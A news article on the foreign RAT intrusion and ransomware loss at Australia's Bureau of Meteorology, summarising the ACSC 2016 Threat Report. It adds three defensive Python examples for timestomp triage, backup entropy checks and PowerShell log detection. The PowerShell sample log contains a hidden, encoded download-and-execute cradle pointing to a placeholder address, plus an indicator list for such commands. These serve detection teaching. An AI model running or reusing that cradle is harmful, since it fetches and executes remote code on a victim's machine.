Foreign spies used RAT to hack Australian weather bureau with weak security controls


Foreign spies made off with an “unknown quantity of documents” after infecting Australia’s meteorology bureau with a RAT, but the fact that security controls at the bureau were “insufficient” even for common cybercrime threats only helped the “state-sponsored cyber adversaries.”

After Australia’s Bureau of Meteorology systems were hacked, unnamed government officials immediately blamed China, and China immediately denied the “groundless accusations.” When the hack hit the news in December 2015, the Bureau of Meteorology (BOM) would not confirm whether its systems had been compromised. In April, Australia’s Prime Minister did confirm there had been a “significant cyber intrusion” at the Bureau.

Now there’s more information available via a threat report (pdf) released by the Australian Cyber Security Center (ACSC).

Back in 2015, investigators at the Australian Signals Directorate (ASD) “detected suspicious activity from two computers on the Bureau of Meteorology’s network.” The ASD “identified the presence of particular Remote Access Tool (RAT) malware popular with state-sponsored cyber adversaries, amongst other malware associated with cybercrime. The RAT had also been used to compromise other Australian government networks.”

The 2016 Threat Report revealed that the ASD found a “password dumping utility used by the adversary and identified the malicious use of at least one legitimate domain administrator account.” The “ASD identified at least six further hosts on the Bureau’s network that the adversary attempted to access, including domain controllers and file servers.”

Between the password dumping utilities and complete access to domain controllers, investigators believe “all passwords on the Bureau’s network were already compromised” by the time an investigation was launched. Evidence suggested that attackers used network scanning and time stamp modification tools to analyze network architecture and to help hide the attack tools on hosts.
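The time stamp modification the report describes is what forensic analysts call timestomping: attack tools are given timestamps that blend in with legitimate system files. On NTFS it leaves traces that can be triaged, because user-mode tools can rewrite the $STANDARD_INFORMATION timestamps but not the $FILE_NAME ones, and tools that set times with one-second granularity leave the sub-second part zero. The following Python is an added example of that triage logic, not a tool the ASD or the report describes; the MFT records, file paths and timestamps are constructed for illustration, and a real run would feed it records parsed from an MFT export.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass
class MftRecord:
    """Timestamps from one NTFS MFT entry (constructed for this example)."""
    path: str
    si_created: datetime    # $STANDARD_INFORMATION creation time (user-mode writable)
    si_modified: datetime   # $STANDARD_INFORMATION last-write time (user-mode writable)
    fn_created: datetime    # $FILE_NAME creation time (set by the kernel)


def timestomp_indicators(rec: MftRecord) -> list[str]:
    """Return the heuristic findings for one record; an empty list means no anomaly."""
    findings = []
    # A file cannot have been created or written before the kernel created it.
    # $FN is refreshed on rename/move, so this comparison assumes the file stayed in place.
    if rec.si_created < rec.fn_created:
        findings.append("si_created_before_fn_created")
    if rec.si_modified < rec.fn_created:
        findings.append("si_modified_before_fn_created")
    # NTFS keeps 100 ns resolution; all-zero sub-seconds suggest a tool set the time
    # with second granularity. Files copied from FAT media or extracted from archives
    # also look like this, so on its own this is a triage hint, not proof.
    if rec.si_created.microsecond == 0 and rec.si_modified.microsecond == 0:
        findings.append("zero_subsecond_timestamps")
    return findings


def scan_records(records: list[MftRecord]) -> dict[str, list[str]]:
    """Map each anomalous path to its findings; clean records are omitted."""
    report = {}
    for rec in records:
        findings = timestomp_indicators(rec)
        if findings:
            report[rec.path] = findings
    return report


def ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


# Constructed sample records: a genuine system file, a dropped file whose $SI times were
# backdated to look like the OS install, and an office document copied from a FAT USB stick.
SAMPLE_RECORDS = [
    MftRecord(r"C:\Windows\System32\kernel32.dll",
              ts("2015-07-10 06:23:11.184213"), ts("2015-07-10 06:23:11.184213"),
              ts("2015-07-10 06:23:11.184213")),
    MftRecord(r"C:\Windows\Temp\update.dat",
              ts("2009-07-14 01:14:36.000000"), ts("2009-07-14 01:14:36.000000"),
              ts("2015-11-02 14:07:52.331900")),
    MftRecord(r"C:\Users\jsmith\report.docx",
              ts("2015-11-03 10:02:15.000000"), ts("2015-11-03 10:45:08.000000"),
              ts("2015-11-03 10:02:15.000000")),
]

if __name__ == "__main__":
    for path, findings in scan_records(SAMPLE_RECORDS).items():
        print(path, "->", ", ".join(findings))
```

The dropped file trips all three checks, while the copied document only trips the sub-second check, which is why the findings are kept separate rather than collapsed into one score: the $SI-before-$FN comparisons carry far more weight than the granularity hint.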

The ASD found evidence of the attackers “searching for and copying an unknown quantity of documents from the Bureau’s network.” It may seem odd for foreign spies to be so interested in a weather bureau, but China was blamed for the 2014 hack of NOAA (National Oceanic and Atmospheric Administration). Australia’s BOM reportedly has one of the most powerful supercomputers, and it provides data to other government agencies.

Regarding the BOM hack, the report stated:

In this instance, the ACSC attributed the primary compromise to a foreign intelligence service; however, security controls in place were insufficient to protect the network from more common threats associated with cybercrime. CryptoLocker ransomware found on the network represented the most significant threat to the Bureau’s data retention and continuity of operations.

Regarding ransomware, a workstation was infected after a government staffer clicked on an Australia Post-themed email. The PC was then re-imaged. However, it wasn’t until three months later, when files for a legal proceeding were needed, that it was discovered that thousands of files on a server had also been encrypted. With that much time passing, the backups also had been affected by the ransomware and were encrypted. By then, it was too late to pay the ransom.
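The backups were lost because the encrypted server files were backed up, generation after generation, until no clean copy remained. One control that catches this is to verify each new backup generation against the previous one before the rotation discards older copies: files that went from low to high byte entropy, or that disappeared (typically renamed with a ransom extension), are counted, and the rotation is refused when the count is out of proportion. The Python below is an added illustration of that check and not a tool mentioned in the report; the two backup generations are constructed in-memory dictionaries, and the thresholds are assumptions to be tuned per environment.

```python
import math
from collections import Counter

HIGH_ENTROPY = 7.5        # bits per byte; encrypted or compressed data sits near 8.0 (assumed threshold)
MAX_SUSPECT_RATIO = 0.05  # refuse rotation if more than 5% of files changed suspiciously (assumed)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def verify_backup_generation(previous: dict[str, bytes], current: dict[str, bytes]) -> dict:
    """Compare a new backup generation with the last good one.

    Only transitions are flagged: a file that was already high-entropy (a zip, a JPEG)
    is not a suspect, which keeps false positives down on ordinary archives.
    """
    suspects = []
    for path, blob in current.items():
        prev = previous.get(path)
        if prev is not None and shannon_entropy(prev) < HIGH_ENTROPY <= shannon_entropy(blob):
            suspects.append(path)
    # Files present last time but gone now: mass renames show up here.
    missing = [path for path in previous if path not in current]
    ratio = (len(suspects) + len(missing)) / max(len(previous), 1)
    return {
        "suspects": suspects,
        "missing": missing,
        "suspect_ratio": ratio,
        "safe_to_rotate": ratio <= MAX_SUSPECT_RATIO,
    }


# Constructed sample data. PLAIN is ordinary document text; SCRAMBLED has every byte value
# equally often (entropy exactly 8.0), standing in for ciphertext.
PLAIN = b"The quick brown fox jumps over the lazy dog. " * 50
SCRAMBLED = bytes(range(256)) * 4

LAST_GOOD_GENERATION = {
    "docs/contract.docx": PLAIN,
    "docs/archive.zip": SCRAMBLED,       # a real compressed file, high entropy on both sides
    "legal/case_2015.pdf": PLAIN,
}
CURRENT_GENERATION = {
    "docs/contract.docx": SCRAMBLED,     # encrypted in place
    "docs/archive.zip": SCRAMBLED,
    "legal/case_2015.pdf.locked": SCRAMBLED,  # encrypted and renamed
}

if __name__ == "__main__":
    print(verify_backup_generation(LAST_GOOD_GENERATION, CURRENT_GENERATION))
    print(verify_backup_generation(LAST_GOOD_GENERATION, LAST_GOOD_GENERATION))
```

Run against the constructed data, the rotation is refused because two of three files changed suspiciously; an unchanged generation passes. In practice this check belongs on the backup host, before the oldest generation is deleted, and it complements rather than replaces keeping at least one generation offline.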

Trends and increases in other cyber threats

Sophisticated adversaries are fast to add new exploits, such as those that were leaked after the Hacking Team was hacked. The ACSC said to expect “terrorists and hacktivists” to continue targeted disclosures and the dumping of PII (personally identifiable information) “in order to embarrass, intimidate or threaten individuals and organizations.”

The ACSC said it has seen an increase in credential harvesting campaigns, DDoS extortion, malvertising and watering hole attacks, as well as an uptick in systems being exploited via PowerShell and Microsoft Office macros. Additionally, the security experts have seen attackers use in-memory malware—malicious programs stored in memory and never written to disk—to better avoid detection, beat forensics and bypass security controls.
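Because in-memory malware never touches disk, the practical detection point for PowerShell-based attacks is the process creation log (Windows event 4688 with command-line auditing enabled) and PowerShell script block logging: the encoded command line or the decoded script block is often the only artifact. The Python below is an added example of that detection logic, not something from the ACSC report; the log lines are constructed in a simplified key=value format, the indicator list is an assumption, and the encoded sample is built in the code from a decoded string so the round trip is visible.

```python
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the usual ones are listed.
ENCODED_SWITCH = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CMD_FIELD = re.compile(r'cmd="([^"]*)"')

# Assumed indicator list: each on its own is seen in legitimate administration, so a line is
# only called suspicious when several appear together.
INDICATORS = ["iex", "invoke-expression", "downloadstring", "frombase64string",
              "-nop", "-w hidden", "-windowstyle hidden", "bypass"]


def decode_encoded_command(token: str):
    """Decode the base64 UTF-16LE payload of -EncodedCommand, or None if it is not valid."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_line(line: str):
    """Return a verdict for a PowerShell process-creation line, or None for other processes."""
    match = CMD_FIELD.search(line)
    if not match or "powershell" not in match.group(1).lower():
        return None
    cmd = match.group(1)
    decoded = None
    enc = ENCODED_SWITCH.search(cmd)
    if enc:
        decoded = decode_encoded_command(enc.group(1))
    # Match indicators against both the visible command line and the decoded payload.
    haystack = (cmd + " " + (decoded or "")).lower()
    hits = [ind for ind in INDICATORS if ind in haystack]
    return {"command": cmd, "decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


def scan_log(lines):
    """Return the analyses of all suspicious PowerShell launches in the given log lines."""
    results = (analyze_line(line) for line in lines)
    return [r for r in results if r and r["suspicious"]]


# Constructed sample log. The address is from the RFC 5737 documentation range.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/update.txt')"
ENCODED = base64.b64encode(INNER.encode("utf-16le")).decode("ascii")
SAMPLE_LOG = [
    '2016-10-12T09:14:03Z host=WS-017 event=4688 cmd="powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\rotate-logs.ps1"',
    f'2016-10-12T09:16:41Z host=WS-017 event=4688 cmd="powershell.exe -nop -w hidden -enc {ENCODED}"',
    '2016-10-12T09:17:02Z host=WS-017 event=4688 cmd="notepad.exe C:\\Users\\jsmith\\notes.txt"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["indicators"], "->", hit["decoded"])
```

The scheduled script in the first line is ignored despite running under PowerShell, while the second line is decoded and flagged on four indicators. Decoding before matching is the important step: string rules applied only to the raw 4688 command line never see what an encoded command actually does, and the same decode is what script block logging performs for you when it is turned on.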

The 2016 Threat Report goes into more details about threats and mitigations, as well as how to prepare for and respond to cybersecurity incidents.
